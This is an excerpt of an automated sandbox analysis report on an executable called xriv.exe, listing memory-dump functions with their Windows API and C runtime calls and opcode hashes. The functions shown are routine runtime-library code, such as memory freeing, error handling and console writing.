                              • __freea.LIBCMT ref: 01394B76
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                              • String ID:
                              • API String ID: 1423051803-0
                              • Opcode ID: 467b6c41b2b9d1a55150c195819821dd3999e82eb94f4e3450325859202fc9c7
                              • Instruction ID: e875f9c141acbf4a4bcfdaf12470c4802d56aa7853ddbba6efc3e4faee40b356
                              • Opcode Fuzzy Hash: 467b6c41b2b9d1a55150c195819821dd3999e82eb94f4e3450325859202fc9c7
                              • Instruction Fuzzy Hash: 0151F17250020BABEF259F69DD40FBF7BA9DF50668F194128FE08A7140E734DC1286A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0138B0E0), ref: 0138B1D0
                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 0138B22A
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0138B0E0,?,000000FF,00000000,00000000), ref: 0138B2B8
                              • __dosmaperr.LIBCMT ref: 0138B2BF
                              • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0138B2FC
                                • Part of subcall function 0138B524: __dosmaperr.LIBCMT ref: 0138B559
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                              • String ID:
                              • API String ID: 1206951868-0
                              • Opcode ID: effd2a4a59af1ee8e4ecac8380d766e44507bd3f338dd5bff7d7ca975c25cc00
                              • Instruction ID: 4389f6664eee2dd6953357ed70c9f57ad04798b2511648a8b2a08f90da6ef4bb
                              • Opcode Fuzzy Hash: effd2a4a59af1ee8e4ecac8380d766e44507bd3f338dd5bff7d7ca975c25cc00
                              • Instruction Fuzzy Hash: F7414B7590070AAFDB24EFB9D8459AFFBF9EF88304B00452EE956D3614EB319904CB21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _free.LIBCMT ref: 013913B4
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 013913C6
                              • _free.LIBCMT ref: 013913D8
                              • _free.LIBCMT ref: 013913EA
                              • _free.LIBCMT ref: 013913FC
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 2cc6a13d9104c0f3a739bef94cca43940c6e79b61364ece10b183434371f0dee
                              • Instruction ID: 1f2be8d8418dd30bb4a3b8a2d4e8f35a064ffe2b52c937df5b5b314b545c397f
                              • Opcode Fuzzy Hash: 2cc6a13d9104c0f3a739bef94cca43940c6e79b61364ece10b183434371f0dee
                              • Instruction Fuzzy Hash: C0F0FF7250420767DB24EFADE4C1C1A7BFDAA1477D7944846E55DE7980CA31F8C0C798
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID: *?
                              • API String ID: 269201875-2564092906
                              • Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                              • Instruction ID: 45a17a3553970fd0756810c823cebabd21099987660d9b914b7af178fd54576c
                              • Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                              • Instruction Fuzzy Hash: 11613C75D0021A9FDF15EFADC8805EDFBF9EF88218B24816AD815E7340D675AE41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AdjustPointer
                              • String ID:
                              • API String ID: 1740715915-0
                              • Opcode ID: 2ed9c13cc54da67e82ad281702e5f5c117c014dc617b0174ada059649e7c78c6
                              • Instruction ID: 3929546214c4b503fd518ab24d28a5ea72abf471dcad00c651067b05855224f6
                              • Opcode Fuzzy Hash: 2ed9c13cc54da67e82ad281702e5f5c117c014dc617b0174ada059649e7c78c6
                              • Instruction Fuzzy Hash: C051C372600306AFFB29AF18D840BBABBA8FF5431DFA445ADDA01576D1E735E940C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetVersionExW.KERNEL32(0000011C,?,B7E58ED7,00000000), ref: 01374D89
                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01374DF0
                              • GetProcAddress.KERNEL32(00000000), ref: 01374DF7
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProcVersion
                              • String ID:
                              • API String ID: 3310240892-0
                              • Opcode ID: 4f8bfc82ad7ad2441bcfd71b9859748ba6b20e258012bd3c639de3ae58c14686
                              • Instruction ID: f5121b301d51aba52ec137b73d4f59ecfe06b8958d7652ac3ac281f7a4c8709f
                              • Opcode Fuzzy Hash: 4f8bfc82ad7ad2441bcfd71b9859748ba6b20e258012bd3c639de3ae58c14686
                              • Instruction Fuzzy Hash: 65512971D142189BEB24EF68CD487DDBB75EB45328F5046A8E408A7781EB395E808B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _free.LIBCMT ref: 0139509E
                              • _free.LIBCMT ref: 013950C7
                              • SetEndOfFile.KERNEL32(00000000,013925FD,00000000,0138D4F0,?,?,?,?,?,?,?,013925FD,0138D4F0,00000000), ref: 013950F9
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,013925FD,0138D4F0,00000000,?,?,?,?,00000000), ref: 01395115
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFileLast
                              • String ID:
                              • API String ID: 1547350101-0
                              • Opcode ID: ed97c636fd034428af64d9bd126e03087c43568ab2d1c2cb410e88a0871e22d8
                              • Instruction ID: 93f9a1d1cedc1c019069256f0036cce7ba0718b5033920ecfb1afbf68ecf0985
                              • Opcode Fuzzy Hash: ed97c636fd034428af64d9bd126e03087c43568ab2d1c2cb410e88a0871e22d8
                              • Instruction Fuzzy Hash: F541D7729013079BEF13BBBCCC45A9E7BB9AF54368F180112F925A7395E634C88087A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0138AE0F: _free.LIBCMT ref: 0138AE1D
                                • Part of subcall function 01390971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01394B40,?,00000000,00000000), ref: 01390A13
                              • GetLastError.KERNEL32 ref: 0138FA02
                              • __dosmaperr.LIBCMT ref: 0138FA09
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0138FA48
                              • __dosmaperr.LIBCMT ref: 0138FA4F
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                              • String ID:
                              • API String ID: 167067550-0
                              • Opcode ID: bae63502ee9d4303099598ef7cb0849c4f0bf7ee7a8ef67360584eda43117180
                              • Instruction ID: 76ba1e5a6d00c2b679e36528024e0adefb8cde61883dc79dea8c11df1a81fadb
                              • Opcode Fuzzy Hash: bae63502ee9d4303099598ef7cb0849c4f0bf7ee7a8ef67360584eda43117180
                              • Instruction Fuzzy Hash: 2521B67160030ABFEB21BF6D888082BF7ADEF0527C7104525F91997250EB35ED108B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(?,00000000,?,0138AD8D,00000000,?,?,?,0138AF26,?), ref: 0138DF49
                              • _free.LIBCMT ref: 0138DFA6
                              • _free.LIBCMT ref: 0138DFDC
                              • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0138AF26,?), ref: 0138DFE7
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: 5c04f801b40375dc084ad680d4f1f0730e4031a01a2cb2b9ec74d464a82a8c79
                              • Instruction ID: f8308948a9a1d0f7392ca57bcd1f0351605476b9b66dc14a3da56d6996d8cdc5
                              • Opcode Fuzzy Hash: 5c04f801b40375dc084ad680d4f1f0730e4031a01a2cb2b9ec74d464a82a8c79
                              • Instruction Fuzzy Hash: 6311C8722087162BDA213BFDAC84E6B36BEDBD177DF640234F229976C0DE3198599210
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(?,?,?,0138B7F5,0138DB7F,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138E0A0
                              • _free.LIBCMT ref: 0138E0FD
                              • _free.LIBCMT ref: 0138E133
                              • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138E13E
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: 48509dc0dd7c6721f9f1b93b3ca3d233c0a08b02ea0d2172fb391e170d8d0c12
                              • Instruction ID: cddf37ea17bbb7951c460e80444b3d7047c956619837ec2ba3d19678e8d4156f
                              • Opcode Fuzzy Hash: 48509dc0dd7c6721f9f1b93b3ca3d233c0a08b02ea0d2172fb391e170d8d0c12
                              • Instruction Fuzzy Hash: 2511C8722047266AD62177BEAC84D6B357EDBD177DF650234F129932C4DE718C528210
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0138E9E2,00000000,?,0139370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0138E893
                              • GetLastError.KERNEL32(?,0139370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0138E9E2,00000000,00000104,?), ref: 0138E89D
                              • __dosmaperr.LIBCMT ref: 0138E8A4
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFullLastNamePath__dosmaperr
                              • String ID:
                              • API String ID: 2398240785-0
                              • Opcode ID: 60a33ad350c092154ede29b9593d07ffa243affa9bde66b191bdacc36ff6ec9a
                              • Instruction ID: 025090fda12a806209cfe5fcc4454d0e8561f3c8ee903a42a0bb89c2fb3b5230
                              • Opcode Fuzzy Hash: 60a33ad350c092154ede29b9593d07ffa243affa9bde66b191bdacc36ff6ec9a
                              • Instruction Fuzzy Hash: 02F03132600316BBDB207FAAD80895AFFAEFF556A57054931F519C6610C731E811DBD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0138E9E2,00000000,?,01393695,00000000,00000000,0138E9E2,?,?,00000000,00000000,00000001), ref: 0138E8FC
                              • GetLastError.KERNEL32(?,01393695,00000000,00000000,0138E9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,0138E9E2,00000000,00000104), ref: 0138E906
                              • __dosmaperr.LIBCMT ref: 0138E90D
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFullLastNamePath__dosmaperr
                              • String ID:
                              • API String ID: 2398240785-0
                              • Opcode ID: 30be31df5ef7aaafddc882576e7e0d33e6cf8809b453e44dc53674c06e9aca8a
                              • Instruction ID: 0e80e231c0143deee31733eda2bac28cdea4871c3fdec35ab43efa76cc2f38e4
                              • Opcode Fuzzy Hash: 30be31df5ef7aaafddc882576e7e0d33e6cf8809b453e44dc53674c06e9aca8a
                              • Instruction Fuzzy Hash: B9F06D32200316BBDB207BAAC808956FFADFF442A97044534F528D6510C775E9218BD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WriteConsoleW.KERNEL32(01375140,0000000F,013A68F8,00000000,01375140,?,01395AA7,01375140,00000001,01375140,01375140,?,01392ECD,00000000,?,01375140), ref: 013963A6
                              • GetLastError.KERNEL32(?,01395AA7,01375140,00000001,01375140,01375140,?,01392ECD,00000000,?,01375140,00000000,01375140,?,01393421,01375140), ref: 013963B2
                                • Part of subcall function 01396378: CloseHandle.KERNEL32(FFFFFFFE,013963C2,?,01395AA7,01375140,00000001,01375140,01375140,?,01392ECD,00000000,?,01375140,00000000,01375140), ref: 01396388
                              • ___initconout.LIBCMT ref: 013963C2
                                • Part of subcall function 0139633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01396369,01395A94,01375140,?,01392ECD,00000000,?,01375140,00000000), ref: 0139634D
                              • WriteConsoleW.KERNEL32(01375140,0000000F,013A68F8,00000000,?,01395AA7,01375140,00000001,01375140,01375140,?,01392ECD,00000000,?,01375140,00000000), ref: 013963D7
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: 32f58c7546ec80fbb11bf4b50a807668aa5b34eccf5aeaa7420024d6a01224dc
                              • Instruction ID: 60a4c137580db4f082b0ae3deaa9ca6a2257ed5f6a66c508b2d38c462098bca5
                              • Opcode Fuzzy Hash: 32f58c7546ec80fbb11bf4b50a807668aa5b34eccf5aeaa7420024d6a01224dc
                              • Instruction Fuzzy Hash: 73F03037441265BBCF726F99EC45A893F6AFB497A5F044124FA1895224C6338920DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SleepConditionVariableCS.KERNELBASE(?,01387157,00000064), ref: 013871DD
                              • LeaveCriticalSection.KERNEL32(013A9708,000000FF,?,01387157,00000064,?,?,?,01373E30,013AC468,B7E58ED7,?,00000000,01398818,000000FF), ref: 013871E7
                              • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,01387157,00000064,?,?,?,01373E30,013AC468,B7E58ED7,?,00000000,01398818,000000FF), ref: 013871F8
                              • EnterCriticalSection.KERNEL32(013A9708,?,01387157,00000064,?,?,?,01373E30,013AC468,B7E58ED7,?,00000000,01398818,000000FF), ref: 013871FF
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                              • String ID:
                              • API String ID: 3269011525-0
                              • Opcode ID: 355448895a70e5506627952461e2e3cfc72cf3d85b28c66d892d9e40fa8dbd26
                              • Instruction ID: 242a2e165f895100c29893768e18c3f104386f1045ca04b8aedd2887df7851f1
                              • Opcode Fuzzy Hash: 355448895a70e5506627952461e2e3cfc72cf3d85b28c66d892d9e40fa8dbd26
                              • Instruction Fuzzy Hash: 36E01236541224BBCA216F55EC09BDA7E1DFB09B6AF410021F50576614C76399008BF5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _free.LIBCMT ref: 0138C8C4
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 0138C8D7
                              • _free.LIBCMT ref: 0138C8E8
                              • _free.LIBCMT ref: 0138C8F9
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 38ebfac68b3d3b142d67e822d3824c8a79fcef1c0bcd082d760b6465d5f8844d
                              • Instruction ID: defab3e2672c14e6f9ea00096bf29178dc4c0db4c077f9659b4f0b153c658557
                              • Opcode Fuzzy Hash: 38ebfac68b3d3b142d67e822d3824c8a79fcef1c0bcd082d760b6465d5f8844d
                              • Instruction Fuzzy Hash: BDE0BF724406279ACB21BF58F80098D3B79A794B2CBC1C047E52837258EA3606D5DB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -
                              • API String ID: 0-2547889144
                              • Opcode ID: 14557f31fca089dc27307abe4cd409f8dbbc917f8ecb7c9cb4737209d00a40cc
                              • Instruction ID: 21558dab96c8ed4ec2f07e845ce7747636ec810d0ada2481dcc3666233a67188
                              • Opcode Fuzzy Hash: 14557f31fca089dc27307abe4cd409f8dbbc917f8ecb7c9cb4737209d00a40cc
                              • Instruction Fuzzy Hash: 222251B0D052599BEF25EB28DD497CDBB75AB22308F5441D8C40927286DB751F88CF92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              • API String ID: 0-203307410
                              • Opcode ID: 5657ca5ba55571635080374ab6aa9854d3df58202bd9334972bfac728fa2089d
                              • Instruction ID: d669034b8c707d2801f425ae10fe288b74032a1f0cfd542dd3dc8f00fd444a69
                              • Opcode Fuzzy Hash: 5657ca5ba55571635080374ab6aa9854d3df58202bd9334972bfac728fa2089d
                              • Instruction Fuzzy Hash: BA41B6B1A0031AAFDB21FF9D9880ADEBBFCEF95358F100066E504E7240D6718A45DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 01388FA2
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: EncodePointer
                              • String ID: MOC$RCC
                              • API String ID: 2118026453-2084237596
                              • Opcode ID: cc6f8e0e28fe653263f3214563324ceebe74095c4ced8c5e206e5cc11a8770a3
                              • Instruction ID: 10b361e8f8451d99fe9fc9e1663a5fb3086883708be34ce3b26efc838da99090
                              • Opcode Fuzzy Hash: cc6f8e0e28fe653263f3214563324ceebe74095c4ced8c5e206e5cc11a8770a3
                              • Instruction Fuzzy Hash: 0D413B71900209AFDF16EFA8DD80EEEBBB6FF88308F184099FA04A7251D3359951DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
